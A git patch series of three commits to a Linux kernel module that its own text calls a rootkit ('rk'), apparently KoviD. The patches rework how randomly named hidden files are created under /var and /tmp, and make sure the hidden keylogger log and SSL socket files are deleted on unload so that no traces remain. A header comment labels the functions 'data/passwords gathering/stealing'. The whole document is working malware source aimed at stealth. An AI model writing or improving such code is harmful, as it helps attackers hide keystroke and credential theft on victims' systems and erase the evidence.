From 51fe88d82fcb6b5994e5391d6f0b9b42c824a5f0 Mon Sep 17 00:00:00 2001 From: JNE Date: Wed, 9 Oct 2024 21:08:45 +0100 Subject: [PATCH 1/3] Fix unused prefix --- src/sys.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/sys.c b/src/sys.c index 2bd72f3..f5d7234 100644 --- a/src/sys.c +++ b/src/sys.c @@ -1037,7 +1037,7 @@ static char *_sys_file(char *prefix, char *file, int len) { *s = '.'; snprintf(&s[1], 7, "%s", kv_util_random_AZ_string(7)); - snprintf(file, len-1, "/var/%s", s); + snprintf(file, len-1, "/%s/%s", prefix, s); { const char *tmp[] = {s,NULL}; fs_add_name_ro(tmp, 0); From 287578bb8cfa7501956722699ed489dcea8475ba Mon Sep 17 00:00:00 2001 From: JNE Date: Thu, 10 Oct 2024 10:23:00 +0100 Subject: [PATCH 2/3] Rafactor rnd strings --- src/util.c | 32 +++++++++++++++++--------------- 1 file changed, 17 insertions(+), 15 deletions(-) diff --git a/src/util.c b/src/util.c index 0237dd1..cd25af1 100644 --- a/src/util.c +++ b/src/util.c @@ -20,28 +20,30 @@ * and must be freed when no longer needed */ char *kv_util_random_AZ_string(size_t size) { - int i = 0; - char *buf = NULL; - if(!size) { - prerr("Wrong size parameter!!\n"); + + static const char charset[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZ" + "abcdefghijklmnopqrstuvwxyz" + "0123456789"; + int i; + u8 byte; + + if (size < 2) { + prerr("Invalid argument\n"); return NULL; } - buf = kmalloc(size+1, GFP_KERNEL); - if(!buf) { - prerr("Could not allocate memory!\n"); + char *buf = kmalloc(size, GFP_KERNEL); + if (!buf) { + prerr("Memory error\n"); return NULL; } - get_random_bytes(buf, size); - for(i = 0; i < size; ++i) { - int byte = (int)buf[i]; - if (byte < 0) - byte = ~byte; - /* ascii A-Z */ - buf[i] = byte % (90 - (65 + 1)) + 65; + for (i = 0; i < size-1; ++i) { + get_random_bytes(&byte, 1); + buf[i] = charset[byte % (sizeof(charset) - 1)]; } - buf[i] = 0; + buf[i] = '\0'; + return buf; } From 232d8a5611d7597400d7302d4b44af6b8a58f0bb Mon Sep 17 00:00:00 2001 From: JNE Date: Thu, 10 Oct 2024 11:31:37 +0100 Subject: [PATCH 3/3] Fixed leftover ssl file ssl socket file was not being removed after rk unload. I also removed the option for not removing tty file: if rk is unloaded, not leftover file should remain --- src/kovid.c | 6 ------ src/lkm.h | 3 --- src/sys.c | 43 ++++++++++++++++++------------------------- 3 files changed, 18 insertions(+), 34 deletions(-) diff --git a/src/kovid.c b/src/kovid.c index caf08e4..963765e 100644 --- a/src/kovid.c +++ b/src/kovid.c @@ -532,12 +532,6 @@ static ssize_t write_cb(struct file *fptr, const char __user *user, /* show current hidden files/directories */ } else if(!strcmp(buf, "-l")) { fs_list_names(); - /* set tty log file to be removed on rmmod */ - } else if (!strcmp(buf, "-t0")) { - kv_keylog_rm_log(true); - /* unset tty log file to be removed on rmmod */ - } else if (!strcmp(buf, "-t1")) { - kv_keylog_rm_log(false); /* fetch base address of process */ } else if (!strncmp(buf, "-b", MIN(2, size))) { char *tmp = &buf[3]; diff --git a/src/lkm.h b/src/lkm.h index 6d10e22..506e0e3 100644 --- a/src/lkm.h +++ b/src/lkm.h @@ -156,9 +156,6 @@ int kv_add_proc_interface(void); void kv_remove_proc_interface(void); int kv_is_proc_interface_loaded(void); -/** data/passwords gathering/stealing */ -void kv_keylog_rm_log(bool); - /** whatever */ char *kv_util_random_AZ_string(size_t); diff --git a/src/sys.c b/src/sys.c index f5d7234..3323b04 100644 --- a/src/sys.c +++ b/src/sys.c @@ -705,25 +705,14 @@ static void _keylog_cleanup_list(void) { } } -static bool _rm_tty_log = true; -void kv_keylog_rm_log(bool rm_log) { - _rm_tty_log = rm_log; -} - -static void _keylog_close_file(void) { - fs_kernel_close_file(ttyfilp); - ttyfilp = NULL; -} - void _keylog_cleanup(void) { char *tty; _keylog_cleanup_list(); - _keylog_close_file(); + fs_kernel_close_file(ttyfilp); + fs_file_rm(sys_ttyfile()); - tty = sys_ttyfile(); - if (tty && _rm_tty_log && fs_file_rm(tty)) - prerr("Error removing %s\n", tty); + ttyfilp = NULL; } #if LINUX_VERSION_CODE < KERNEL_VERSION(5,12,0) @@ -1035,9 +1024,8 @@ static char *_sys_file(char *prefix, char *file, int len) { if (*file == 0) { char s[8] = {0}; - *s = '.'; - snprintf(&s[1], 7, "%s", kv_util_random_AZ_string(7)); - snprintf(file, len-1, "/%s/%s", prefix, s); + snprintf(&s[0], 7, "%s", kv_util_random_AZ_string(7)); + snprintf(file, len-1, "%s%s", prefix, s); { const char *tmp[] = {s,NULL}; fs_add_name_ro(tmp, 0); @@ -1049,13 +1037,21 @@ static char *_sys_file(char *prefix, char *file, int len) { } char *sys_ttyfile(void) { - static char tty[16]; - return _sys_file("var", tty, sizeof(tty)); + static char file[16] = {0}; + if (*file == '\0') { + if (!_sys_file("/var/.", file, 16)) + return NULL; + } + return file; } char *sys_sslfile(void) { - static char ssl[16]; - return _sys_file("tmp", ssl, sizeof(ssl)); + static char file[16] = {0}; + if (*file == '\0') { + if (!_sys_file("/tmp/.", file, 16)) + return NULL; + } + return file; } bool sys_init(void) { @@ -1082,12 +1078,9 @@ bool sys_init(void) { void sys_deinit(void) { struct sys_addr_list *sl, *sl_safe; - char *ssl = sys_sslfile(); - - if (ssl) - fs_file_rm(ssl); fh_remove_hooks(ft_hooks); + fs_file_rm(sys_sslfile()); _keylog_cleanup(); list_for_each_entry_safe(sl, sl_safe, &sys_addr, list) {